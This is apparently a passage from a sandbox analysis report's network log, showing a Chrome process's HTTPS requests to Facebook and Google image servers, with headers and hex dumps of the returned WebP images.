                                                                                                                                                                                                                                  Data Ascii: \d|"nMr\HjBL9O@9mUXfv8@vcv|l"^CQx<fJ,_\}Stzq`~1e<(Syc6/8DQALDhwkd"1$P8g`2DZ&.}4 l80 `V%S6F42O}k<;"4e
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC762INData Raw: 62 fa fd 4c 03 c9 8e 12 75 a4 2e 4e 40 14 9b 6f 09 81 fd a4 2b 51 bf 25 9c d9 1c d8 55 18 a7 35 e0 19 95 b6 26 a3 88 8f 40 d6 17 00 3c 99 71 74 7f 7f df ca 65 33 f3 95 b8 d4 d6 4f bb 7e 2d a8 83 a6 00 ff 09 43 f8 98 54 4b 7b ad 5e 39 57 d8 97 21 11 8a 6f f6 5c a3 ff 1f 40 d4 94 7d 6f 6b b0 64 a3 31 f5 a1 5f f0 e3 85 8a ac be f6 e5 76 70 b9 73 5d dc ad 2f 98 7c f7 8b 54 5b 96 a3 28 20 4f 28 48 a3 c8 dc 19 83 d9 3a 5f b7 dc 14 d5 f8 45 59 11 31 79 39 2c 66 46 f0 5d 90 45 69 81 3f a4 36 e1 a7 84 a1 03 ae c6 75 77 fc 49 89 06 6b 64 29 f3 38 6c e0 4e fa 3f df 96 9c 0b ed 60 70 1a 0a 7e 5b cc 9f 41 07 1b a0 4d cc 24 88 12 83 0a b1 e4 53 a7 70 21 dd ac a6 d4 59 0b 5a 4d 6e fe 92 ad df 49 db 7d ca d1 6b 72 2c 46 ce da ae ca cd a0 66 38 24 7f d6 59 1b 77 79 b9 5d
                                                                                                                                                                                                                                  Data Ascii: bLu.N@o+Q%U5&@<qte3O~-CTK{^9W!o\@}okd1_vps]/|T[( O(H:_EY1y9,fF]Ei?6uwIkd)8lN?`p~[AM$Sp!YZMnI}kr,Ff8$Ywy]


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  102192.168.2.649944157.240.252.354431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:44 UTC849OUTPOST /ajax/webstorage/process_keys/?state=1 HTTP/1.1
                                                                                                                                                                                                                                  Host: www.facebook.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Content-Length: 550
                                                                                                                                                                                                                                  X-FB-LSD: AVrc04HtcqM
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                  X-ASBD-ID: 129477
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/?locale=ru_RU
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
                                                                                                                                                                                                                                  2024-09-29 04:53:44 UTC550OUTData Raw: 6c 6f 63 61 6c 5f 73 74 6f 72 61 67 65 5b 53 65 73 73 69 6f 6e 5d 3d 32 30 26 6c 6f 63 61 6c 5f 73 74 6f 72 61 67 65 5b 68 62 5f 74 69 6d 65 73 74 61 6d 70 5d 3d 31 33 26 6c 6f 63 61 6c 5f 73 74 6f 72 61 67 65 5b 73 69 67 6e 61 6c 5f 66 6c 75 73 68 5f 74 69 6d 65 73 74 61 6d 70 5d 3d 31 33 26 73 65 73 73 69 6f 6e 5f 73 74 6f 72 61 67 65 5b 54 61 62 49 64 5d 3d 36 26 73 65 73 73 69 6f 6e 5f 73 74 6f 72 61 67 65 5b 73 70 5f 70 69 5d 3d 32 32 32 26 6c 6f 67 74 69 6d 65 3d 30 26 5f 5f 75 73 65 72 3d 30 26 5f 5f 61 3d 31 26 5f 5f 72 65 71 3d 35 26 5f 5f 68 73 3d 31 39 39 39 35 2e 42 50 25 33 41 44 45 46 41 55 4c 54 2e 32 2e 30 2e 2e 30 2e 30 26 64 70 72 3d 31 26 5f 5f 63 63 67 3d 47 4f 4f 44 26 5f 5f 72 65 76 3d 31 30 31 36 39 30 30 35 35 31 26 5f 5f 73 3d 38
                                                                                                                                                                                                                                  Data Ascii: local_storage[Session]=20&local_storage[hb_timestamp]=13&local_storage[signal_flush_timestamp]=13&session_storage[TabId]=6&session_storage[sp_pi]=222&logtime=0&__user=0&__a=1&__req=5&__hs=19995.BP%3ADEFAULT.2.0..0.0&dpr=1&__ccg=GOOD&__rev=1016900551&__s=8
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC1607INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7419923760461973556", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(self), clipboard-write=(self), compute-pressure=(), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(self), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), private-state-token-issuance=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  cross-origin-opener-policy: same-origin-allow-popups
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                  Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC1122INData Raw: 72 65 70 6f 72 74 2d 74 6f 3a 20 7b 22 6d 61 78 5f 61 67 65 22 3a 32 35 39 32 30 30 30 2c 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 62 72 6f 77 73 65 72 5f 72 65 70 6f 72 74 69 6e 67 5c 2f 63 6f 6f 70 5c 2f 3f 6d 69 6e 69 6d 69 7a 65 3d 30 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 6f 6f 70 5f 72 65 70 6f 72 74 22 2c 22 69 6e 63 6c 75 64 65 5f 73 75 62 64 6f 6d 61 69 6e 73 22 3a 74 72 75 65 7d 2c 20 7b 22 6d 61 78 5f 61 67 65 22 3a 32 35 39 32 30 30 2c 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 61 6a 61 78 5c 2f 62 72 6f 77 73 65 72 5f 65 72 72 6f 72
                                                                                                                                                                                                                                  Data Ascii: report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC80INData Raw: 34 35 0d 0a 66 6f 72 20 28 3b 3b 29 3b 7b 22 5f 5f 61 72 22 3a 31 2c 22 70 61 79 6c 6f 61 64 22 3a 7b 22 6b 65 79 73 22 3a 5b 5d 7d 2c 22 6c 69 64 22 3a 22 37 34 31 39 39 32 33 37 36 30 34 36 31 39 37 33 35 35 36 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 45for (;;);{"__ar":1,"payload":{"keys":[]},"lid":"7419923760461973556"}0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  103192.168.2.649940216.58.212.1504431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:44 UTC1088OUTGET /VRMWkE5p3CkWhJs6nv-9ZsLAs1QOg5ob1_3qg-rckwYW7yp1fMrYZqnEFpk0IoVP4LM=s52-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://play.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC530INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 2956
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:45 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 04:53:45 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Age: 0
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC860INData Raw: 52 49 46 46 84 0b 00 00 57 45 42 50 56 50 38 4c 78 0b 00 00 2f 33 c0 0c 00 09 33 6d db a8 ed 4e f3 67 3c 0e 11 fd 4f 08 46 0e cb 15 d5 d2 44 b9 24 fe 82 6d 24 49 4e fa 05 5a 6b 4c f2 8f 8e 08 70 49 81 6d 23 49 8a 2a ff 38 8f d9 bc 07 43 40 92 48 ff 3f d7 ff 04 f2 e1 17 7f 0a 80 4a d0 7b 34 76 6a 56 af ed f9 dc 82 8f 92 e7 32 dc ff 2f 00 5c c0 1d e0 cf e0 69 db b6 63 af 68 5b db af e7 55 4b 5a ba 6d db 76 ef 35 0c 95 6c 1b 25 db b6 6d 54 6d 1b dd b6 ed de 9b d3 92 f7 7d 9f ab 90 74 fc 84 f3 a6 24 db b6 dd 48 59 e7 3e 49 99 05 d4 a7 4b d0 63 7e cc bf 48 49 ef 78 a2 6d db b4 6d 6b db 72 ed 63 ee 75 b7 f7 be b6 6d db 76 e8 a6 1b b2 7d 6f f4 44 af 6f d8 b6 11 b4 6d db 36 1e 6c ad 39 e7 50 6f 31 01 b7 fe af 44 83 1e 1d e8 98 63 64 ec c7 3c 8c 98 58 cd e2 28 47
                                                                                                                                                                                                                                  Data Ascii: RIFFWEBPVP8Lx/33mNg<OFD$m$INZkLpIm#I*8C@H?J{4vjV2/\ich[UKZmv5l%mTm}t$HY>IKc~HIxmmkrcumv}oDom6l9Po1Dcd<X(G
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC1390INData Raw: 2e f5 ac 35 2c d8 a5 9e e3 a8 e9 54 e8 83 50 21 20 14 09 45 10 12 0a 2c 2f bf ef ff 08 9b 59 4d 86 1f 5e f3 f7 9c 9f 61 f7 5c 6d c7 22 79 6d a6 af be de c3 c8 96 80 82 bf 68 49 d9 5d ba d2 ba cf 73 14 13 2f f9 38 23 2b 2b 7d b0 50 24 48 28 d6 80 a2 25 41 98 fa ff 47 6d d3 b1 48 5e 96 e9 b1 d7 c7 39 7c f1 fd e8 29 c1 56 1e 72 bd 81 85 2d 05 1a e5 8f 09 5a 20 94 b4 cd dd b6 b2 e0 35 2b 34 0a 14 61 61 1e 83 91 4b df 7f 3f f1 ff ef c7 de 5b 1d 09 ae 25 6f b5 f9 fb 5c fe fb df db 70 c0 cc e1 a5 fb 61 73 60 95 f6 b7 c9 63 af 8f b0 bc 6e 76 93 b4 6c da 38 60 64 22 a0 88 35 99 32 84 16 3e bf df f1 75 20 c8 3b 66 09 28 42 31 33 0d 0e bf 79 fd ec 1b 5d 7a 12 77 a0 09 2a 19 53 f2 91 e4 c7 72 65 46 a6 2f 99 df a9 49 5e 17 f5 f1 81 4f bb 3e cc fc 0e 13 81 f8 a2 fe 3f
                                                                                                                                                                                                                                  Data Ascii: .5,TP! E,/YM^a\m"ymhI]s/8#++}P$H(%AGmH^9|)Vr-Z 5+4aaK?[%o\pas`cnvl8`d"52>u ;f(B13y]zw*SreF/I^O>?
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC706INData Raw: ce d1 ad 63 5b 07 5b 9b 53 1b 90 92 2c 58 cb 25 b6 8a c3 87 ef a3 33 13 6f 9d 85 2b 82 9c 3d ef 90 7f 9f af 2c 84 9a 0c 5f fc 7e 6c e6 80 31 90 f3 b2 63 6c 19 5b c3 a9 a3 29 ad a4 85 94 36 c9 46 3e e8 27 7f f5 fe df 92 66 92 ff 9c 91 53 e7 ad 41 0a 14 1b fe 74 9e 75 6a 2a d9 59 9e f2 3e f2 49 7d 51 73 5e ce 1b 5b 4e 49 5a 67 28 47 68 68 f5 66 7f fc a1 fd f2 4f 7d 4f 6f 29 39 e5 ab e6 8e 9c 38 07 6b 0a 14 0d 8a 0d 9f bc 5f bf ee 41 2b e4 3e fb 8e 47 4c 2c 29 d0 24 7b 66 76 ec 19 5b c6 29 39 e1 26 c7 5c e7 0a 6f e1 7d fc cd fb b1 4f 7e 1f b9 3d 96 95 cd b2 c3 6f 9d ef e6 2e fc 17 04 24 59 83 a2 29 9a 62 cd 8a 07 ec 3b 77 20 33 8f 7a 1f fe e9 cf 0f 3f 90 5f 5d cd 5f 4f 72 e1 c4 ff ec 6c 67 7d cf ac ef f5 3d d9 b1 97 bd 36 6b 7b ad 1c df b8 e2 85 9e b9 83 6b
                                                                                                                                                                                                                                  Data Ascii: c[[S,X%3o+=,_~l1cl[)6F>'fSAtuj*Y>I}Qs^[NIZg(GhhfO}Oo)98k_A+>GL,)${fv[)9&\o}O~=o.$Y)b;w 3z?_]_Orlg}=6k{k


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  104192.168.2.649943216.58.212.1504431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:44 UTC1105OUTGET /mw_NfsvKM8m6RPv8Fz2GQawCOsqWv010saMnc7zbWalMxuaA9IY8h7E0VMieLxSxAFB98NFeYqbFrXXq=w48-h16-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://play.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC532INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 148
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:18:01 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 04:18:01 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  Age: 2144
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC148INData Raw: 52 49 46 46 8c 00 00 00 57 45 42 50 56 50 38 4c 7f 00 00 00 2f 0f c0 03 10 85 d3 6a db 96 e5 dd e9 9f 00 5d 40 47 80 c4 04 16 35 31 81 bb 43 a2 ba 47 92 33 82 bb 3c e1 fd fe 77 86 88 23 ff 4f 00 a0 f0 b0 d3 7b 15 50 bd d9 ec 49 29 a5 89 88 88 9b 8d ee 54 1f 2f 5d a9 d8 f6 11 a9 b0 7d 1d 11 31 5e f0 8e 7c d1 b6 7e 13 7d d9 a4 42 d9 cd 42 25 c7 8c 4a 50 cb f6 25 d9 ac 5c b2 ce ac 25 c8 e8 b5 24 98 0d 4b fa 59 2c 22 e8 5c 1a 16 2f 3f 23 02 00
                                                                                                                                                                                                                                  Data Ascii: RIFFWEBPVP8L/j]@G51CG3<w#O{PI)T/]}1^|~}BB%JP%\%$KY,"\/?#


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  105192.168.2.649956216.58.212.1504431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1094OUTGET /K6kGejYk6GTdg5AenV4A0e-Nc48xjZ_-Qj50IUO5pUCf0V6EpJbeOku4Rk73atcPD4A=w416-h235-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://play.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC531INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 75826
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:46 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 04:53:46 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Age: 0
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC859INData Raw: 52 49 46 46 2a 28 01 00 57 45 42 50 56 50 38 4c 1e 28 01 00 2f 9f 81 32 00 4d 48 0c c0 36 6c 9b 00 14 08 49 90 fe 3f d8 ea f6 42 44 ff 27 40 6a 03 08 9e 7e 26 92 9f dd 66 77 af 19 c7 00 6d 7b 59 c2 df 04 b0 3e d4 1f bc 3d 04 40 01 ed 82 1d db 56 f2 09 f8 e0 08 2a f2 2b f8 ee 3a 01 86 3d fc 4e f8 06 2c 20 00 ee bd 49 02 5c 9f 7b ef ed aa fc 38 48 ce 84 d3 0e 99 24 64 0e 0f f8 3b 49 c2 9c cf 39 07 b8 48 55 92 41 60 42 9e 73 86 ef ed 24 bf fc 23 92 5c a0 26 40 f2 47 92 b0 65 7b bb c8 84 e4 6c 40 49 80 00 37 01 8c 83 78 c6 97 40 71 2d 70 f9 39 98 e7 b2 a5 9c 93 2c e3 ef 93 7b c9 90 7d aa 0c 7f e7 34 09 db 96 f4 b8 1f 63 5a b2 c9 00 f3 9c 93 40 28 60 d8 fa ec bd ed ee d9 2d f1 9e 5b 09 80 79 4e f2 40 2f 60 4c 2f 9e 31 28 79 62 3e b6 6d 7d ee 2a c7 f1 6d 20 24
                                                                                                                                                                                                                                  Data Ascii: RIFF*(WEBPVP8L(/2MH6lI?BD'@j~&fwm{Y>=@V*+:=N, I\{8H$d;I9HUA`Bs$#\&@Ge{l@I7x@q-p9,{}4cZ@(`-[yN@/`L/1(yb>m}*m $
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: 8d 9c 3b f7 22 84 4a e5 1b 94 f8 1a 4c df 4d 6d c5 76 cd 11 47 d3 11 97 57 c0 33 3c 1b f8 62 78 de 2c 8d 13 db f3 f5 f1 7c bb e3 ff a3 fd 14 b9 bd 76 bb d2 24 4e f5 a2 01 a2 e6 85 39 7a 74 41 0a 54 8d 1a 15 14 a0 34 7c c3 50 a3 26 75 9b d9 fa 74 e8 9c 70 8d 67 0b cf 76 fc cc b5 e6 62 e5 31 fb cb 3f 87 ab 1f cb bc 2c e3 9b eb 2d f5 a8 02 f4 1d 8f 9a d7 d6 5b d6 4f cd a6 0a 78 a1 26 2e 53 8f 07 89 28 00 08 00 8a a9 4a e0 f5 01 a1 41 32 25 da 05 c6 c3 54 0f 5d 78 80 e3 f5 66 b4 76 51 2b 11 8a 71 de 94 68 c1 a1 bf 34 3b ca dd 28 98 af 54 6b a3 99 7c 77 88 8b 5e 94 65 01 60 53 14 c5 99 ba b6 87 75 61 1d ae 54 54 3d 40 10 c4 c9 f0 b2 b6 32 34 8b ef 22 7c c6 f9 17 bf 7d d8 56 a3 fd 37 bd b2 dd 5f 67 94 f4 a8 58 9e 10 c4 1c e7 2e 0c eb 05 f9 b9 af ef 58 06 8b be
                                                                                                                                                                                                                                  Data Ascii: ;"JLMmvGW3<bx,|v$N9ztAT4|P&utpgvb1?,-[Ox&.S(JA2%T]xfvQ+qh4;(Tk|w^e`SuaTT=@24"|}V7_gX.X
